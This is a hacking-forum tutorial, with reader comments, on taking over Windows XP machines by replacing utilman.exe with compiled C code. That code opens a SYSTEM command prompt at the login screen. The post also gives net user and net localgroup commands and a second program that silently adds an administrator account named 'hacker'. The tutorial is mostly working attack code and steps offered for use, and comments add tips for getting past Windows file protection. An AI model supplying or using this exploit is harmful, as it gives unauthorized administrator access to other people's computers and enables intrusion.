Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Create an Admin account through utilman.exe on Windows XP


Create an Admin account through utilman.exe on Windows XP

By ghostghost | 16877 Reads |
0     0

Disclaimer: This article is used for educational purposes only. I take no responsibility in any actions that result from you misusing the information you learn by reading this. The code you see in this article is not my own. This article is intended to only show the steps on how to use this code to gain Administrator access.


Alright, so there are many ways to gain Administrator access on a local machine but this one has not been mentioned yet. Not only will you get Administrator access but you will get a whole new account!

To start out we will be replacing the utilman.exe file. Now what is utilman.exe anyways?? Utilman is the Windows Utility manager giving you access to useful UI settings within Windows such as the Windows Magnifier and Narrator. It gets loaded when Windows boots up. Very nice for what we want to accomplish.

Now that we know what it is how do we use it to gain Admin access?? Well first we need to do some coding. Here is the code that you need to compile in some c/c++ compiler. I used Borland 5.5. Nice, quick, free, and easy compiler to use.

#include <stdio.h> #include <windows.h> #include <tchar.h>

void _tmain(void)

{

   STARTUPINFO s;
   PROCESS_INFORMATION p;
   LPTSTR szCmdline = _tcsdup(TEXT(&quot;CMD&quot;));
   LPTSTR szDesktop = _tcsdup(TEXT(&quot;WinSta0&#92;&#92;Winlogon&quot;));

   ZeroMemory(&s, sizeof(s));
   s.cb = sizeof(s);
   s.lpDesktop = szDesktop;
   ZeroMemory(&p, sizeof(p));

   CreateProcess(NULL, szCmdline, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &s, &p);

   CloseHandle(p.hProcess);
   CloseHandle(p.hThread);

}

Copy and paste this code into a text file and name it "utilman.c". Compile the code and now you have a file called utilman.exe. Now the most important part is you have to have access to C:\Windows\System32 folder on the local machine. If you do then you're in great condition. If you don't have access then read other articles on here about how to gain access to unprivileged directories.

Now that we have access to the directory we want to rename utilman.exe in the \System32 folder to something like "utilman.exe.bak". Always very important to backup your files! Now take your compiled copy of utilman.exe and place it into the \System32 directory. Restart your computer now.

After your computer reboots you will be brought to the login prompt screen. If you don't have the classic login prompt active then holding in ctrl +alt and pushing the delete key twice will bring you to it. Now use this key combination to bring up a command prompt. Press Windows key + U. If you have done everything correctly up to this point then you will be looking at a command prompt running as system. Now as system we can add accounts to the local machine. Type the following into the prompt:

net user "username you want" "password you want" /add

Ex. net user aVoid hacker /add

now press enter

Now our account is created and we need to add it to the Administrator group. Enter this command to do that:

net localgroup administrators "username you specified earlier" /add

Ex. net localgroup administrators aVoid /add

now press enter

Now we have an Administrator account!! Minimize or exit out of the command prompt and enter your username and password you specified earlier and login to Windows.

Congratulations you have access to the local machine as Administrator!! Now we need to go back to the \System32 folder and rename the backup copy of Utilman back to Utilman.exe

Ex. "Utilman.exe.bak" back to "Utilman.exe"

Note: If you get a Windows access error you need to open up task manager and kill the Utilman.exe process.


Now if you don't want to type all that out in the command prompt then compile this C code instead of the previous one.

#include <stdio.h> #include <windows.h>

int main(int argc, char* argv[])

{

system(&quot;net user hacker hack /add&quot;);
system(&quot;net localgroup administrators hacker /add&quot;);

return 0;

}

Note: You may receive warnings about the params of argv and argc depending on the compiler you use when compiling this code. Just ignore them.

After you compile this code follow the same steps as before. When you get to the login prompt you need to switch to the classic prompt and use the Windows key + U key sequence. You will not see a command prompt this time!! Now simply login with your specified username and password that you set in the code. If you didn't set any then the defaults will be username:hacker / password:hack Remember to restore the backup of utilman.exe!!

Hope you enjoyed this article! Sorry, it's so lengthy but I tried to write it so even the most novice computer users will be able to understand it.

Happy Hacking! aVoid

Comments
ghost's avatar
ghost 17 years ago

It's ok except, it's a bit sk1ddy. I mean, could you explain what the c program is doing. I'm assuming it runs cmd as a process or something when the comp starts up. But, I dunno, so I'll give you a chance to explain it, then I'll rate it.;)

ghost's avatar
ghost 17 years ago

Very nice and easy to read!! Will be trying this soon! TY

korg's avatar
korg 17 years ago

Already have this but your missing some things, Looks real familiar http://didierstevens.wordpress.com/tag/hacking/.Search the site it gives more examples.

ghost's avatar
ghost 17 years ago

this thing doesn't work. seriously, I've been f$%/ing with it all night. so, the problem lies in the SFC (the Windoze file checking library). it prevents you to alter utilman.exe and make the cmd. try it, the bastard pops up all over again. so, as I've been googling and reading about this for the past couple of hours or so, here's a working page that describes how to get past the SFC. very interesting stuff. http://www.bitsum.com/aboutwfp.asp didierstevens is a nice blog, but the explanation is not very complete - it tells you 'how' but it doesn't tell you 'why'. so, to get this hack done (and understand it), you'll need the blog provided in comments and the site that i gave.

happy hacking. N

ghost's avatar
ghost 17 years ago

yep, done it today. works. thanks for the article. :happy:

ghost's avatar
ghost 17 years ago

or you could just try using at, in the command prompt